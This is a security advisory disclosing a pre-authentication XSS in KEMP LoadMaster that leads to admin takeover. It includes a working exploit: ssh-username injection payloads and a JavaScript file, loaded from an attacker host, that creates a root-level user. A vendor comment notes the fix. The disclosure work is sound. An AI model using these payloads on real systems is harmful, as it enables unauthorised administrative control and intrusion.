SSD Advisory – KEMP LoadMaster from XSS Pre Authentication to RCE

Vulnerability Summary
KEMP’s main product, the LoadMaster, is a load balancer built on its own proprietary software platform called LMOS, that enables it to run on almost any platform: As a KEMP LoadMaster appliance, a Virtual LoadMaster (VLM) deployed on Hyper-V, VMWare, on bare metal or in the public cloud. KEMP is available in Azure, where it is in the top 15 deployed applications as well as in AWS and VMWare vCloud Air.
A cross site scripting web vulnerability has been discovered in KEMP LoadMaster v7.135.0.13245 (latest). A non authenticated user is able to inject his own malicious Javascript code into the system and use it to create a new web administrator user.
Vendor response
We were unable to get an update beyond this statement from the vendor:
Expect a fix in our new version available Jan 2017.

Vulnerability Details
The issue is located in the System Configuration > System Log Files – View Audit LogFile (Image 1) section.

Once administrative access is obtained, the attacker can use it to execute arbitrary code.
Proof of Concept (PoC):
1 – Verify, in the victim machine the Audit LogFile (System Configuration > System Log Files): it is empty (Image 2)

2 – Inject simple HTML/JS code in the log page, using the ssh client: from an attacker machine open a shell and type the following code:

ssh \<button\ onclick\=alert\(1\)\>Click\<\/button\>@10.0.8.145

3 – Let the login fail using wrong password (Image 4)

4 – Check again the log page (View Audit LogFile): as you can see the HTML/JS code has been correctly injected (Image 5)

Attack script:
1 – Start a web server and host on attack machine the following JS file (kemp_attack.js) (Image 6)

//BEGIN////////////////////////////////////////////////////////
openl = function(verb, url, data, target) {
  var form = document.createElement("form");
  form.action = url;
  form.method = verb;
  form.target = target || "_self";
  if (data) {
    for (var key in data) {
      var input = document.createElement("textarea");
      input.name = key;
      input.value = typeof data[key] === "object" ? JSON.stringify(data[key]) : data[key];
      form.appendChild(input);
    }
  }
  form.style.display = 'none';
  document.body.appendChild(form);
  form.submit();
};
//modify the target IP (10.0.8.145) and user/pass as necessary
openl('POST', 'https://10.0.8.145/progs/useradmin/add', {user:'Peru',pass:'GoSecure!',s:'Add+User'}, 'newWindow');
//modify the target IP as necessary, xuser must be equal to user. Increase the timeout (250) for debug
setTimeout(function(){openl('POST', 'https://10.0.8.145/progs/useradmin/setopts', {xuser:'Peru',root:'1'}, 'newWindow');}, 250);
//modify the target IP as necessary. The timeout must be greater than the previous
setTimeout(function(){openl('', 'https://10.0.8.145/', '', 'newWindow');}, 500);
//////////////////////////////////////////////////////////END//

2 – Verify permission of kemp_attack.js (chmod 644 kemp_attack.js)
3 – Verify users currently enabled in Kemp LoadMaster from System Configuration > User Management. As you can se no user (a part from default one) is active in the appliance (Image 8)

4 – Inject the attack code: from the attacker machine open a shell and type the following code:

ssh \<script \ src\=\"http\&\#x3A\;\/\/10\.0\.8\.130\/kemp\_attack\.js\"\>\</script>@10.0.8.145

5 – Check again the log page (View Audit LogFile): this will activate the script
6 – Check again the User Management page: a new user as been created with all permissions. (Image 9)

7 – At this point, being a user with unlimited permissions, allows you to run any commands you wish.

Comments
  • Ramaswamy says:

    XSS Vulnerability with Remote Code Execution
    An XSS vulnerability impacting the KEMP LoadMaster family of products tracked under KEMP reference number PD-8290 allowed non-authenticated users to inject Javascript code which would allow for the creation of administrative users under certain circumstances. This was resolved in the 7.2.37 version of the LoadMaster Operating System (LMOS), released in February 2017. The resolution addressed an issue that allowed browsers to execute JavaScript from warning logs. The resolution was implemented by having logs sanitized before they are displayed to ensure that scripts are not displayed and are inoperative. This fix was also backported to our 7.1.35 long term support branch. LoadMaster release 7.2.37 and later, as well as the Long-Term Support Release of 7.1.35.2 and later include the fix. In order to mitigate this vulnerability, customers are advised to migrate to one of the aforementioned versions. The latest GA version of LoadMaster and Long-Term Support releases can be accessed at https://support.kemptechnologies.com/hc/en-us/categories/200141477-Downloads. Please contact KEMP Support for any further questions and support with migration related activities by submitting a request at https://support.kemptechnologies.com/hc/en-us/requests/new.

Comments are closed.